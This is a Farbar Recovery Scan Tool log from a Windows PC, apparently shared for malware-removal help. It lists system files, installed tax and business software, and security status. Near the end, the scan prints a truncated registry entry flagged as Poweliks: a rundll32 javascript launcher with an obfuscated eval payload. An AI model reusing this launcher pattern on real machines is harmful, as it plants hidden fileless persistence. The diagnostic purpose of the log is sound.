2014-12-09 13:00 - 2014-11-21 18:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-12-09 13:00 - 2014-11-21 18:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-12-09 13:00 - 2014-11-21 18:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-12-09 13:00 - 2014-11-21 18:34 - 06039552 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-12-09 13:00 - 2014-11-21 18:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-12-09 13:00 - 2014-11-21 18:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-12-09 13:00 - 2014-11-21 18:22 - 19749376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-12-09 13:00 - 2014-11-21 18:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-12-09 13:00 - 2014-11-21 18:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-12-09 13:00 - 2014-11-21 18:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-12-09 13:00 - 2014-11-21 18:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-12-09 13:00 - 2014-11-21 18:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-12-09 13:00 - 2014-11-21 18:07 - 00501248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-12-09 13:00 - 2014-11-21 18:07 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-12-09 13:00 - 2014-11-21 18:06 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-12-09 13:00 - 2014-11-21 18:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-12-09 13:00 - 2014-11-21 18:05 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-12-09 13:00 - 2014-11-21 18:01 - 02277888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-12-09 13:00 - 2014-11-21 17:59 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-12-09 13:00 - 2014-11-21 17:58 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-12-09 13:00 - 2014-11-21 17:56 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-12-09 13:00 - 2014-11-21 17:54 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-12-09 13:00 - 2014-11-21 17:49 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-12-09 13:00 - 2014-11-21 17:49 - 00718848 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-12-09 13:00 - 2014-11-21 17:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-12-09 13:00 - 2014-11-21 17:46 - 02125312 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-12-09 13:00 - 2014-11-21 17:45 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-12-09 13:00 - 2014-11-21 17:43 - 14412800 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-12-09 13:00 - 2014-11-21 17:40 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-12-09 13:00 - 2014-11-21 17:36 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-12-09 13:00 - 2014-11-21 17:35 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-12-09 13:00 - 2014-11-21 17:33 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-12-09 13:00 - 2014-11-21 17:29 - 04299264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-12-09 13:00 - 2014-11-21 17:28 - 02358272 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-12-09 13:00 - 2014-11-21 17:23 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-12-09 13:00 - 2014-11-21 17:22 - 02052096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-12-09 13:00 - 2014-11-21 17:21 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-12-09 13:00 - 2014-11-21 17:15 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-12-09 13:00 - 2014-11-21 17:13 - 12836864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-12-09 13:00 - 2014-11-21 17:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-12-09 13:00 - 2014-11-21 17:00 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-12-09 13:00 - 2014-11-21 16:56 - 01307136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-12-09 13:00 - 2014-11-21 16:54 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-12-09 13:00 - 2014-11-10 19:09 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-12-09 13:00 - 2014-11-10 18:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-12-09 13:00 - 2014-11-10 17:46 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2014-12-09 12:59 - 2014-11-07 19:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-12-09 12:59 - 2014-11-07 18:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-12-09 12:59 - 2014-10-29 18:03 - 00165888 _____ (Microsoft Corporation) C:\Windows\system32\charmap.exe
2014-12-09 12:59 - 2014-10-29 17:45 - 00155136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2014-12-09 12:59 - 2014-10-02 18:12 - 02020352 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2014-12-09 12:59 - 2014-10-02 18:12 - 00346624 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2014-12-09 12:59 - 2014-10-02 18:12 - 00310272 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2014-12-09 12:59 - 2014-10-02 18:12 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2014-12-09 12:59 - 2014-10-02 18:11 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2014-12-09 12:59 - 2014-10-02 17:45 - 01177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2014-12-09 12:59 - 2014-10-02 17:45 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2014-12-09 12:59 - 2014-10-02 17:45 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2014-12-09 12:59 - 2014-10-02 17:45 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2014-12-09 12:59 - 2014-10-02 17:44 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2014-12-09 12:43 - 2015-01-06 14:15 - 00001006 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk
2014-12-09 12:43 - 2015-01-06 14:15 - 00000990 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2014-12-09 12:43 - 2014-12-09 12:48 - 00000000 ____D () C:\Program Files (x86)\LogMeIn
2014-12-09 12:43 - 2014-12-09 12:43 - 00000000 ____D () C:\Users\georgepc\AppData\Local\LogMeIn
2014-12-09 12:43 - 2014-10-31 11:55 - 00107392 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll
2014-12-09 12:43 - 2014-10-31 11:54 - 00092520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll
2014-12-09 12:43 - 2014-10-31 11:54 - 00035688 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll
2014-12-09 12:43 - 2014-10-31 11:15 - 00072216 _____ (LogMeIn, Inc.) C:\Windows\system32\Drivers\LMIRfsDriver.sys
2014-12-09 12:38 - 2014-12-09 12:38 - 26279936 _____ () C:\Users\georgepc\Downloads\LogMeIn.msi
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2015-01-07 13:43 - 2014-09-01 08:03 - 00000000 ____D () C:\Users\georgepc\Documents\Outlook Files
2015-01-07 12:52 - 2014-06-03 17:19 - 01967789 _____ () C:\Windows\WindowsUpdate.log
2015-01-07 12:50 - 2014-10-02 15:39 - 00000580 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3959093455-1914111138-4206043169-1001.job
2015-01-07 12:50 - 2014-07-23 21:27 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-01-07 12:12 - 2014-10-02 13:44 - 00000000 ____D () C:\Users\georgepc\AppData\Local\CrashDumps
2015-01-07 09:44 - 2014-07-19 13:04 - 00000000 ____D () C:\ProgramData\MFAData
2015-01-07 08:50 - 2014-07-23 21:27 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-06 16:56 - 2014-09-04 20:13 - 00005002 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for GeorgePan-PC-georgepc GeorgePan-PC
2015-01-06 14:23 - 2009-07-13 20:45 - 00031312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-06 14:23 - 2009-07-13 20:45 - 00031312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-06 14:17 - 2014-06-03 15:48 - 00006462 _____ () C:\Windows\SysWOW64\Gms.log
2015-01-06 14:17 - 2014-06-03 15:42 - 00000000 ____D () C:\Program Files (x86)\Dell Backup and Recovery
2015-01-06 14:15 - 2014-12-06 17:30 - 00000000 ____D () C:\ProgramData\LogMeIn
2015-01-06 14:15 - 2009-07-13 21:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-06 14:15 - 2009-07-13 20:51 - 00039188 _____ () C:\Windows\setupact.log
2015-01-06 13:00 - 2014-08-19 09:19 - 00000000 ____D () C:\Users\georgepc\AppData\Roaming\TeamViewer
2015-01-05 18:21 - 2014-07-23 21:31 - 00000000 ____D () C:\Ame 2.0
2015-01-05 18:14 - 2009-07-13 21:13 - 00783606 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-05 11:45 - 2014-07-19 12:05 - 00000000 ____D () C:\ProgramData\softthinks
2015-01-03 20:39 - 2009-07-13 20:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-01-02 20:59 - 2014-08-07 10:21 - 00000000 ____D () C:\PAS42
2014-12-31 21:48 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-12-31 16:13 - 2010-11-20 19:47 - 00277854 _____ () C:\Windows\PFRO.log
2014-12-31 08:59 - 2014-08-05 15:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Update AME 2.0
2014-12-30 16:05 - 2014-11-20 21:51 - 00000000 ____D () C:\Users\georgepc\AppData\Local\Avg2015
2014-12-30 13:12 - 2014-06-03 15:53 - 00000000 ____D () C:\ProgramData\Atheros
2014-12-30 09:50 - 2014-09-23 08:59 - 00000000 __SHD () C:\Users\georgepc\Documents\cache
2014-12-30 08:03 - 2014-09-23 08:58 - 00000000 ____D () C:\ProgramData\WebEx
2014-12-24 20:35 - 2014-11-20 21:53 - 00000000 ____D () C:\ProgramData\AVG2015
2014-12-23 03:56 - 2014-07-26 15:08 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2014-12-21 13:52 - 2014-10-02 15:39 - 00003620 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3959093455-1914111138-4206043169-1001
2014-12-16 09:27 - 2014-07-23 22:06 - 00001998 ____H () C:\Users\georgepc\Documents\Default.rdp
2014-12-16 08:52 - 2014-07-19 12:52 - 00000000 ____D () C:\Users\georgepc
2014-12-15 12:26 - 2014-07-26 23:13 - 00000000 ____D () C:\Users\georgepc\AppData\Local\Microsoft Help
2014-12-15 11:56 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\Registration
2014-12-13 03:00 - 2009-07-13 19:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared
2014-12-12 03:54 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\rescache
2014-12-11 16:57 - 2014-06-03 15:42 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-12-10 03:16 - 2014-07-21 02:30 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-12-10 03:16 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-12-10 03:16 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\AppCompat
2014-12-09 12:43 - 2014-12-06 17:30 - 00001024 _____ () C:\.rnd
2014-12-09 12:36 - 2014-07-19 13:08 - 00000000 ____D () C:\Windows\system32\appmgmt
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2015-01-04 00:23
==================== End Of Log ============================
Addition.txt
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 07-01-2015
Ran by georgepc at 2015-01-07 13:43:55
Running from C:\Users\georgepc\Desktop\Geekstogo
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
2010 Lacerte Tax (HKLM-x32\...\2010 Lacerte Tax) (Version: - Intuit Inc.)
64 Bit HP CIO Components Installer (Version: 4.2.1 - Hewlett-Packard) Hidden
Accidental Damage Services Agreement (HKLM-x32\...\{EF85FEF4-EB92-4075-A6D2-5F519BB30A2C}) (Version: 2.0.0 - Dell Inc.)
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Reader XI MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.00 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
AME 2.0 (HKLM-x32\...\AME 2.0) (Version: - AME Software Products, Inc.)
AME 2.0 (x32 Version: 2.0 - AME Software Products, Inc.) Hidden
AME Efiling 2014 version 2.5.1 (HKLM-x32\...\{BB38C01D-7F97-4D9E-8E6B-38FC2E1C9DF9}_is1) (Version: 2.5.1 - AME Software Products, Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.170 - Atheros)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5577 - AVG Technologies)
AVG 2015 (Version: 15.0.4257 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5577 - AVG Technologies) Hidden
Banctec Service Agreement (HKLM-x32\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{C57F6C71-C365-4AFF-9108-397BBAD6127F}) (Version: 1.0.204 - Citrix)
Complete Care Business Service Agreement (HKLM-x32\...\{0ECFCB07-9BFE-4970-ACA1-D568D982760B}) (Version: 2.0.0 - Dell Inc.)
Consumer In-Home Service Agreement (HKLM-x32\...\{F47C37A4-7189-430A-B81D-739FF8A7A554}) (Version: 2.0.0 - Dell Inc.)
Creative Solutions Accounting - Workstation (HKLM-x32\...\Creative Solutions Accounting Workstation) (Version: - )
Dell Backup and Recovery - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 1.7.1.2 - Dell Inc.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.7.1.2 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{D850CB7E-72BC-4510-BA4F-48932BFAB295}) (Version: 2.9.901.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Home Systems Service Agreement (HKLM-x32\...\{AB2FDE4F-6BED-4E9E-B676-3DCCEBB1FBFE}) (Version: 2.0.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 9.0 - Dell Inc.)
eFileCabinet 2014 Client (HKLM-x32\...\{4E422FDA-BA7A-4EB4-9B9D-C6E66815B93F}) (Version: 5.0.0 - eFileCabinet, inc)
eFileScanner 5 (HKLM-x32\...\{EFE78675-4C12-43C8-961C-439F5C55A3D4}) (Version: 5.0.0 - eFileCabinet, Inc)
FileCabinet CS (HKLM-x32\...\FileCabinet CS) (Version: 13.1.0 - Thomson Reuters)
FileCabinet CS Print Driver (HKLM-x32\...\FileCabinet CS Print Driver) (Version: 13.1.0 - Thomson Reuters)
Fixed Assets CS (HKLM-x32\...\Fixed Assets CS) (Version: 13.1.0 - Thomson Reuters)
Foxit PhantomPDF Business (HKLM-x32\...\{E9AA5BDC-7DFA-4CB8-96B5-F545F20EBFDB}) (Version: 7.0.3.916 - Foxit Software Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
GoToAssist Customer 2.2.0.758 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.2.0.758 - Citrix Online)
GoToMeeting 7.0.5.2130 (HKU\S-1-5-21-3959093455-1914111138-4206043169-1001\...\GoToMeeting) (Version: 7.0.5.2130 - CitrixOnline)
Infragisticsv112Install 2013 (HKLM-x32\...\{E20658ED-E86A-4681-9649-2AB8151B4ADF}) (Version: 13.1.0 - Thomson Reuters)
Infragisticsv62Install 2010 (HKLM-x32\...\{705292ED-22B2-4BCF-8DD4-F9B393844D7D}) (Version: 10.1.0 - Thomson Reuters)
Intel® Chipset Device Software (x32 Version: 10.0.13 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1168 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.0.2.1001 - Intel Corporation)
Intel® Update Manager (HKLM-x32\...\{AD6B46F2-FE21-496F-BE90-BE19AABE353C}) (Version: 2.2.12 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Intuit Runtime Components 6.0.16 (HKLM-x32\...\{6A3CAA8E-6DDB-4AA7-A411-9982FF9180FE}) (Version: 6.0.16 - Intuit Inc.)
LogMeIn (HKLM-x32\...\{F93EE340-3735-4032-8B74-0A3E489017A0}) (Version: 4.1.4670 - LogMeIn, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4675.1003 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3959093455-1914111138-4206043169-1001\...\OneDriveSetup.exe) (Version: 17.3.1171.0714 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4675.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4675.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4675.1003 - Microsoft Corporation) Hidden
Padgett 4.2 Client (HKLM-x32\...\{C3130FA3-57C6-47E3-ADEA-1656CC072C1E}) (Version: 4.2 - Padgett Business Services)
PAS42Client (x32 Version: 1.00.000 - Sybase) Hidden
Premium Service Agreement (HKLM-x32\...\{C33AA6D6-F5EC-48F3-AFDC-8141345D473A}) (Version: 2.0.0 - Dell Inc.)
QualxServ Service Agreement (HKLM-x32\...\{903679E8-44C8-4C07-9600-05C92654FC50}) (Version: 2.0.0 - Dell Inc.)
Quickfinder Tax & Financial Tools (HKLM-x32\...\{2C6BA65D-90D8-4F86-9525-62DABB693C9D}) (Version: 123.131.03585 - Thomson Reuters)
Quickfinder Tax & Financial Tools Shared Files (HKLM-x32\...\{DEAF53FA-06E1-4B1D-875E-F729EC303C35}) (Version: 123.131.03585 - Thomson Reuters)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.30164 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6909 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Small Business Tools 2007 (HKLM-x32\...\Small Business Tools 2007) (Version: - )
TaxTools 2011 (HKLM-x32\...\{A2E08D37-BEA0-43D7-94A1-D88246D39F94}) (Version: 11.111.147 - CFS Tax Software, Inc.)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.32494 - TeamViewer)
UltraTax Font Installer (HKLM-x32\...\{7177CDFD-3274-4F8C-977F-7C82C73CA34C}) (Version: 12.00.0000 - Thomson Reuters)
UltraTax Font Installer (HKLM-x32\...\{7699AA03-8A8C-489E-AF9D-A76A5E97E879}) (Version: 1.00.0000 - Thomson Tax & Accounting)
Update AME 2.0 version 2.3.1 (HKLM-x32\...\{1A2CBA77-0146-4CC5-A9C5-93C8DDB9D303}_is1) (Version: 2.3.1 - AME Software Products, Inc.)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinZip 19.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E5}) (Version: 19.0.11293 - WinZip Computing, S.L. )
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Citrix\GoToMeeting\2031\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\SkyDriveShell64.dll (Microsoft Corporation)
